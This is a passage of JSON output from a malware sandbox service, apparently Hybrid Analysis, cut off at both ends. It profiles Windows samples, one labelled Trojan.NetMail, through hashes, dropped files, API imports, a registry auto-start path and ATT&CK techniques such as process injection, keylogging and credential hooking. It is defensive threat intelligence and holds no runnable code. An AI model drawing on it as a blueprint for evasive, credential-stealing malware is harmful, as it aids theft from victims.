(Indicator: \"TerminateProcess\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "Remote Access Related", "identifier": "string-531", "type": 2, "relevance": 1, "name": "Contains references to RPC protocol sequence strings", "description": "Found string \"+ncalrpc:[OLE91971942F2F1487781A249DD0E75]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00005808.00000000.72468.001A0000.00000004.mdmp\")\n Found string \"+ncalrpc:[OLEBF2A284DE02B44A49034C5282A1E]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00005808.00000000.72468.001A0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "stream-129", "type": 1, "relevance": 5, "name": "Contains ability to modify processes thread functionality", "description": "NtResumeThread@NTDLL.DLL at 00000000-00003852-37687-4-0040541C", "origin": "Hybrid Analysis Technology", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"DISMHOST.EXE.67A47DCC.bin\" claimed CRC 103114 while the actual is CRC 17877815", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "VirtualProtect\n GetProcAddress\n LoadLibraryA\n RegCloseKey\n SetSecurityDescriptorDacl\n RegOpenKeyExW\n OutputDebugStringW\n GetModuleFileNameW\n GetVersionExW\n OutputDebugStringA\n GetVersionExA\n GetFileAttributesW\n GetCommandLineW\n UnhandledExceptionFilter\n LoadLibraryExW\n GetTickCount\n MapViewOfFile\n CreateFileMappingW\n CreateThread\n GetSystemDirectoryW\n GetModuleHandleA\n FindResourceExW\n GetStartupInfoA\n GetModuleHandleW\n TerminateProcess\n LoadLibraryW\n GetModuleHandleExW\n CreateFileW\n Sleep", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "string-184", "type": 2, "relevance": 5, "name": "Found registry location strings which can modify auto-execute functionality", "description": "Found string \"Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11CF-8B85-00AA005B4383}\" (Indicator: \"software\\microsoft\\active setup\\installed components\"; in Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "stream-34", "type": 1, "relevance": 8, "name": "Contains ability to write to a remote process", "description": "WriteProcessMemory@KERNEL32.DLL at 00000000-00003852-37687-5-004054F5\n WriteProcessMemory@KERNEL32.DLL at 00000000-00003852-37687-6-00405473", "origin": "Hybrid Analysis Technology", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"DISMHOST.EXE.67A47DCC.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00003852]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "stream-5", "type": 1, "relevance": 8, "name": "Contains ability to create a remote thread (often used for process injection)", "description": "RtlCreateUserThread@NTDLL.DLL at 00000000-00003852-37687-4-0040541C", "origin": "Hybrid Analysis Technology", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\" has section name UPX1 with entropy \"7.86813851091\"\n \"DISMHOST.EXE.67A47DCC.bin\" has section name .text with entropy \"6.11476781338\"\n \"DISMHOST.EXE.67A47DCC.bin\" has section name .data with entropy \"6.44580003198\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\" has a section named \"UPX0\"\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\" has a section named \"UPX1\"\n \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\" has a section named \"UPX2\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "stream-131", "type": 1, "relevance": 5, "name": "Contains ability to retrieve the fully qualified path of module", "description": "GetModuleFileNameW@KERNEL32.DLL at 00000000-00003852-37687-14-00401973", "origin": "Hybrid Analysis Technology", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "stream-88", "type": 1, "relevance": 1, "name": "Contains ability to terminate a process", "description": "ExitProcess@KERNEL32.DLL at 00000000-00003852-37687-1-00402211", "origin": "Hybrid Analysis Technology", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "stream-22", "type": 1, "relevance": 5, "name": "Contains native function calls", "description": "NtResumeThread@NTDLL.DLL at 00000000-00003852-37687-4-0040541C", "origin": "Hybrid Analysis Technology", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9
https://hybrid-analysis.com/sample/29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9
Hybrid Analysis - Infostealers
{"size": 1007952, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9", "sha256": "29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9", "av_detect": 93, "vx_family": "Trojan.NetMail", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates": [{"owner": "CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US", "issuer": "CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US", "serial_number": "3300000439f61f7a676da000af000000000439", "md5": "07:BA:2F:13:9D:35:45:5A:93:4A:B0:CE:D1:0C:BE:41", "sha1": "5A:25:7D:33:37:18:C4:B4:68:A5:DB:C6:64:33:48:AF:66:7A:EE:3D", "valid_from": "2021-09-02T18:25:58+00:00", "valid_until": "2022-09-01T18:25:58+00:00"}, {"owner": "CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US", "issuer": "CN=Microsoft Root Certificate Authority 2010, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US", "serial_number": "610c524c000000000003", "md5": "B7:A7:B4:60:5E:33:38:9F:48:B3:3D:17:CA:E7:30:06", "sha1": "8B:FE:31:07:71:2B:3C:88:6B:1C:96:AA:EC:89:98:49:14:DC:9B:6B", "valid_from": "2010-07-06T20:40:17+00:00", "valid_until": "2025-07-06T20:50:17+00:00"}], "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 1, "total_processes": 2, "total_signatures": 193, "extracted_files": [{"name": "upNext.exe", "file_path": "%LOCALAPPDATA%\\upNext.exe", "file_size": 1007952, "sha256": "544b678b60052a903d710a94a862fe7c08f1276f4b4a85ddc5efda79e1efa074", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe (PID: 5952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.tmp", "file_path": "C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.tmp", "file_size": 1007952, "sha256": "23853af2ae3971ab20fc574fb9c191be871907f39de6cd2682e2a0cc0dc776e4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe (PID: 5952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "upNext.exe.bin", "file_size": 1007952, "sha256": "23853af2ae3971ab20fc574fb9c191be871907f39de6cd2682e2a0cc0dc776e4", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "upNext.tmp", "file_size": 1007952, "sha256": "544b678b60052a903d710a94a862fe7c08f1276f4b4a85ddc5efda79e1efa074", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005952", "name": "29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe", "normalized_path": "C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe", "sha256": "29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9"}, {"uid": "00000000-00001484", "name": "upNext.exe", "normalized_path": "%LOCALAPPDATA%\\upNext.exe", "command_line": "--i", "sha256": "23853af2ae3971ab20fc574fb9c191be871907f39de6cd2682e2a0cc0dc776e4"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 4, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Code Signing", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002", "informative_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 4, "informative_identifiers_count": 17}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 4, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": 